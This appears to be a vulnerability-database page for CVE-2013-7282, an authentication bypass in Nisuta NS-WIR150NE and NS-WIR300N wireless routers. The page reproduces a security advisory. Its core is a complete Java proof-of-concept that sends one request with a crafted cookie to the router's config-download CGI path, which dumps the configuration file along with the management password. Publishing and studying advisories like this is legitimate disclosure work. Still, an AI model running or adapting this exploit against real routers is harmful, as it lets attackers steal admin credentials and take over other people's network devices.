Nisuta NS-WIR150NE, NS-WIR300N Authentication Bypass

2014.01.11
Credit: ampliasecurity
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-7282
CWE: CWE-287


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

// Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability // Amplia Security - Amplia Security Research Advisory (AMPLIA-ARA050913) // PoC exploit - dumps the router's configuration files which includes the management interface password // and other information // compile: javac poc.java // run: java poc > router.cfg import java.net.URL; import java.net.URLConnection; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; public class poc { public static void main(String[] args) { try { URL url = new URL("http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg"); URLConnection conn = url.openConnection(); conn.setRequestProperty("Cookie", ":language=en"); BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream())); String line; while ((line = rd.readLine()) != null) { System.out.println(line); } } catch(Exception e) { e.printStackTrace(); } } };

References:

http://www.ampliasecurity.com/advisories/nisuta-nswir150ne-nswir300n-wireless-router-remote-management-web-interface-authentication-bypass-vulnerability.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top